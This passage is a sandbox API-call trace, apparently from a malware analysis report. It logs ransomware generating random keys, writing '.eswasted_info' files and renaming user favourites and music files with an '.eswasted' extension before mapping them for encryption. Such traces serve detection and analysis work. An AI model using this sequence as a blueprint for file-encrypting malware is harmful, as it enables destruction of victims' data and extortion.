"c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.eswasted")) returned 1 [0079.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0079.049] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0079.049] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x85 [0079.049] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0079.049] CloseHandle (hObject=0xf8) returned 1 [0079.051] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0079.052] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0079.052] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.052] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0079.053] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0079.053] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.062] SetEndOfFile (hFile=0xfc) returned 1 [0079.064] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.064] CloseHandle (hObject=0xfc) returned 1 [0079.068] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8aa8 | out: hHeap=0x4a0000) returned 1 [0079.068] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0c48 | out: hHeap=0x4a0000) returned 1 [0079.068] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0079.069] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0079.069] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.069] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0079.069] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x298) returned 0x4d8aa8 [0079.069] lstrcpyW (in: lpString1=0x4d8b36, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.069] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.069] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0079.070] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.070] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0079.071] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.072] SetEndOfFile (hFile=0xfc) returned 1 [0079.072] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.072] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.072] lstrcpyW (in: lpString1=0x4d8b36, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.072] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.eswasted")) returned 1 [0079.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0079.075] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0079.075] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x85 [0079.076] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0079.076] CloseHandle (hObject=0x118) returned 1 [0079.079] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0079.080] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0079.080] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.080] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0079.081] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0079.081] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.122] SetEndOfFile (hFile=0xfc) returned 1 [0079.124] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.124] CloseHandle (hObject=0xfc) returned 1 [0079.126] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8aa8 | out: hHeap=0x4a0000) returned 1 [0079.126] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0d30 | out: hHeap=0x4a0000) returned 1 [0079.126] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0079.127] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0079.127] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.127] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0079.127] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x298) returned 0x4ef6d8 [0079.127] lstrcpyW (in: lpString1=0x4ef766, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.127] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.127] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0079.128] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.128] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0079.129] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.130] SetEndOfFile (hFile=0xfc) returned 1 [0079.130] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.130] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.130] lstrcpyW (in: lpString1=0x4ef766, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.130] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.eswasted")) returned 1 [0079.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0079.164] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0079.164] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x85 [0079.164] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0079.164] CloseHandle (hObject=0xf8) returned 1 [0079.167] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0079.168] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d8da0 | out: pbBuffer=0x4d8da0) returned 1 [0079.168] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.168] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0079.169] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0079.169] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.177] SetEndOfFile (hFile=0xfc) returned 1 [0079.179] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.179] CloseHandle (hObject=0xfc) returned 1 [0079.181] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6d8 | out: hHeap=0x4a0000) returned 1 [0079.181] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0e18 | out: hHeap=0x4a0000) returned 1 [0079.181] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0079.182] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0079.182] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.182] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 81 [0079.182] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ac) returned 0x4f6210 [0079.183] lstrcpyW (in: lpString1=0x4f62b2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.183] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.183] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0079.183] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.183] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0079.185] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.186] SetEndOfFile (hFile=0xfc) returned 1 [0079.186] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.186] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.186] lstrcpyW (in: lpString1=0x4f62b2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.186] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.eswasted")) returned 1 [0079.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0079.216] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0079.216] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x85 [0079.216] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0079.217] CloseHandle (hObject=0x118) returned 1 [0079.219] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0079.220] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0079.220] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.220] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0079.221] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0079.221] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.229] SetEndOfFile (hFile=0xfc) returned 1 [0079.231] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.231] CloseHandle (hObject=0xfc) returned 1 [0079.233] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6210 | out: hHeap=0x4a0000) returned 1 [0079.233] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fbf48 | out: hHeap=0x4a0000) returned 1 [0079.233] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0079.234] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0079.234] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.234] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 80 [0079.234] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2aa) returned 0x4f6210 [0079.234] lstrcpyW (in: lpString1=0x4f62b0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.234] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.234] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0079.235] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.235] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0079.235] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.237] SetEndOfFile (hFile=0xfc) returned 1 [0079.237] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.237] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.237] lstrcpyW (in: lpString1=0x4f62b0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.eswasted")) returned 1 [0079.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0079.391] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0079.391] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x85 [0079.391] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0079.391] CloseHandle (hObject=0xf8) returned 1 [0079.394] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0079.395] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0079.395] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.395] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0079.396] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0079.396] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.452] SetEndOfFile (hFile=0xfc) returned 1 [0079.454] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.454] CloseHandle (hObject=0xfc) returned 1 [0079.456] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6210 | out: hHeap=0x4a0000) returned 1 [0079.456] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fc048 | out: hHeap=0x4a0000) returned 1 [0079.456] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0079.457] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0079.457] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.457] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\7VesVgj4dpoklOXOd7.mp3") returned 75 [0079.457] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a0) returned 0x4cb238 [0079.457] lstrcpyW (in: lpString1=0x4cb2ce, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.457] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.457] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0079.458] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.458] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\7VesVgj4dpoklOXOd7.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\7vesvgj4dpokloxod7.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0079.459] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.460] SetEndOfFile (hFile=0xfc) returned 1 [0079.460] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.460] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.460] lstrcpyW (in: lpString1=0x4cb2ce, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\7VesVgj4dpoklOXOd7.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\7vesvgj4dpokloxod7.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\7VesVgj4dpoklOXOd7.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\7vesvgj4dpokloxod7.mp3.eswasted")) returned 1 [0079.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\7VesVgj4dpoklOXOd7.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\7vesvgj4dpokloxod7.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0079.461] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0079.461] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x10533 [0079.461] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10533) returned 0xb10000 [0079.461] CloseHandle (hObject=0x100) 